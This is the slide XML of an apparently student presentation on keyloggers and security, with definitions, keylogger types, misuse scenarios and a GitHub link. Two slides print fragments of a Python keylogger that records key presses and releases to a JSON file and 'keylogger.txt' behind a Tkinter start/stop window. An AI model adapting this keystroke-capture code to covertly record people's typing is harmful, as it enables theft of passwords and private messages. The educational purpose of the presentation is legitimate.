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6" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="262" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="265" r:id="rId17"/>
    <p:sldId id="27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i Sunar"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7T11:36:46.4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3Preeti/keylogger_newproject.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6343015" cy="492125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>                          PREETI SUNAR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484620" y="2821305"/>
            <a:ext cx="2022475" cy="379730"/>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2" name="Text Box 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8152765" y="3201035"/>
            <a:ext cx="3855720" cy="584835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:no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152400"/>
            <a:ext cx="8534400" cy="6369050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>flag = True</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>def on_release(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    generate_text_log(str(keys))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>def start_keylogger():</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    listener.start()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    start_button.config(state='disabled')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457200" y="457200"/>
            <a:ext cx="8534400" cy="6188710"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> stop_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>def stop_keylogger():</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    listener.stop()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    label.config(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    start_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    stop_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>root = Tk()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>root.title("Keylogger")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>label.pack()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>start_button.pack(side=LEFT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>stop_button.pack(side=RIGHT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>root.geometry("250x250")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>root.mainloop()</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790"/>
            <a:ext cx="7891780" cy="4983480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:no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12" name="Picture 11" descr="Screenshot 2024-06-17 103541"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="990600"/>
            <a:ext cx="9292590" cy="5346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61315" y="226695"/>
            <a:ext cx="10083165" cy="6291580"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>SEQUENCE DIAGRAM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screenshot 2024-06-17 103558"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="521970"/>
            <a:ext cx="7071360" cy="6175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460"/>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609600" y="1170940"/>
            <a:ext cx="8312785" cy="4725035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cmpd="sng">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>MOUSE LOG FILE                             KEYBOARD LOG FILE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Screenshot 2024-06-17 110818"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1755140"/>
            <a:ext cx="3503930" cy="3915410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Screenshot 2024-06-17 111339"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705350" y="1755140"/>
            <a:ext cx="4648200" cy="3885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533400"/>
            <a:ext cx="6466205" cy="560705"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>GITHUB LINK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2438400"/>
            <a:ext cx="8534400" cy="276860"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId1" tooltip="" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://github.com/3Preeti/keylogger_newproject.git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6323330" cy="1125855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4250"/>
              <a:t>KEYLOGGER &amp; SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>                             -&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>What is keylogger?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>  -&gt;Keylogger Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>  -&gt;Overview </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>  -&gt;End Users Intro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>  -&gt;Solution and its value proposition </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>  -&gt;Coding Snippets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>  -&gt;Modelling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>  -&gt;Results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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4800" y="228600"/>
            <a:ext cx="7630160" cy="60375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lang="en-US" sz="3200" b="0" spc="10" dirty="0"/>
              <a:t>              What is keylogger?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" b="0" spc="10" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3200" b="0" spc="10" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" spc="10" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" spc="10" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" b="0" spc="10" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>A keylogger, sometimes called a keystroke logger, is a type of surveillance technology </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" spc="10" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>or a particularly insidious type of spyware that can record and steal consecutive keystrokes (and much more) that the user enters on a device.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900" b="0" spc="10" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1900" b="0" spc="10" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" spc="10" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>2. It can be either hardware or software-based. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1900" b="0" spc="10" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1900" b="0" spc="10" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" spc="10" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>3. Such systems are also highly useful for law enforcement and espionage.</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900" b="0" spc="10" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1900" b="0" spc="10" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs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423795" y="328295"/>
            <a:ext cx="6321425" cy="532130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>KEYLOGGER TYPES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422275" y="1069340"/>
            <a:ext cx="9257665" cy="5714365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Hardware-based keyloggers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A hardware-based keylogger is a small device that serves as a connector between the keyboard and the computer. The device is designed to resemble an ordinary keyboard PS/2 connector, part of the computer cabling or a USB adapter, making it relatively easy for someone who wants to monitor a user's behavior to hide the device.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Software-based keyloggers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A keylogging software program does not require physical access to the user's computer for installation. It can be purposefully downloaded by someone who wants to monitor activity on a particular computer, or it can be malware downloaded unwittingly by the user of the keyboard and its device, and then executed as part of a rootkit or remote administration Trojan. Either way, keylogging software allows an unauthorized threat actor to view the user's keystrokes, and then use this knowledge to access and compromise the device.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screenshot 2024-06-17 103749"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="2209800"/>
            <a:ext cx="4334510" cy="1463675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Screenshot 2024-06-17 111246"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6012815" y="5547360"/>
            <a:ext cx="2732405" cy="123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938135" cy="49320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br>
              <a:rPr sz="4250" spc="-20" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr sz="4250" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" spc="-20" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>A key logger is a software that records keystrokes or keys that you press on a keyboard.Passwords,credit cards,numbers,confidential messages and other information are at risk of being recorded and retrieved by a cybercriminal when you type them on a keyboard of a compromised computer.A key logger basically position itself between  the keyboard of a compromised computer.These applications has various features,such as taking recording audio output, occasional screenshots,monitoring active apps and visited websites and so on.Hackers can distribute a keylogger on peer-to-peer networks or include one as a file attachment to a phishing email.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" b="0" spc="-20" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:cs typeface="Calibri" panose="020F050202020403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62000" y="457200"/>
            <a:ext cx="8498205" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" spc="25" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-20" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="20" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-235" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-10" dirty="0"/>
              <a:t>AR</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="15" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-10" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-15" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="15" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-20" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="30" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="15" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="10" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-25" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-10" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="5" dirty="0"/>
              <a:t>S?</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="4400" spc="5" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr sz="4400" spc="5" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>Keyloggers are often used as a spyware tool by cybercriminals to steal personally identifiable information, login credentials and sensitive enterprise data.</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
              <a:t>That said, some uses of keyloggers could be considered ethical or appropriate in varying degrees. For instance, keyloggers can also be used for the following reasons:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900" b="0" spc="5" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:rPr>
